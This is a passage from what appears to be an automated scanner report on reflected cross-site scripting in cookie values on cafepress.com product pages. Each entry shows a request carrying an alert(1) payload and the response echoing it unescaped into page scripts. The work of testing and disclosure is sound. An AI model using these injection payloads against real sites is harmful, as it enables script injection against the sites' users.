__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA179e4"-alert(1)-"9112d7547c6; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 58907
Date: Sun, 26 Dec 2010 13:47:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:30 GMT; path=/
Set-Cookie: cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:30 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA179e4"-alert(1)-"9112d7547c6";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.67. http://www.cafepress.com/+thermos [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+thermos

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dee73</script><script>alert(1)</script>b29a0dee205 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+thermos HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=dee73</script><script>alert(1)</script>b29a0dee205; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
Cteonnt-Length: 58934
Date: Sun, 26 Dec 2010 13:47:29 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/
Set-Cookie: cp_sc=100465; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:29 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'dee73</script><script>alert(1)</script>b29a0dee205'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.68. http://www.cafepress.com/+underwear-panties [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+underwear-panties

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f16ed"-alert(1)-"d43c21ef02f was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+underwear-panties HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAf16ed"-alert(1)-"d43c21ef02f; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 59420
Date: Sun, 26 Dec 2010 13:47:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:21 GMT; path=/
Set-Cookie: cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:21 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59420

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf16ed"-alert(1)-"d43c21ef02f";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.69. http://www.cafepress.com/+underwear-panties [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+underwear-panties

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c3af</script><script>alert(1)</script>ca50a4bf9d6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+underwear-panties HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=7c3af</script><script>alert(1)</script>ca50a4bf9d6; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 59441
Date: Sun, 26 Dec 2010 13:47:17 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/
Set-Cookie: cp_sc=100246; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:17 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '7c3af</script><script>alert(1)</script>ca50a4bf9d6'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.70. http://www.cafepress.com/+water-bottles [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+water-bottles

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35244"-alert(1)-"6a269d15e05 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA35244"-alert(1)-"6a269d15e05; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 61013
Date: Sun, 26 Dec 2010 13:47:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:25 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 61013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA35244"-alert(1)-"6a269d15e05";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.71. http://www.cafepress.com/+water-bottles [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+water-bottles

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c2b6f</script><script>alert(1)</script>6386f2e7ab was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+water-bottles HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=c2b6f</script><script>alert(1)</script>6386f2e7ab; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 61029
Date: Sun, 26 Dec 2010 13:47:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/
Set-Cookie: cp_sc=100144; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:24 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 61029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
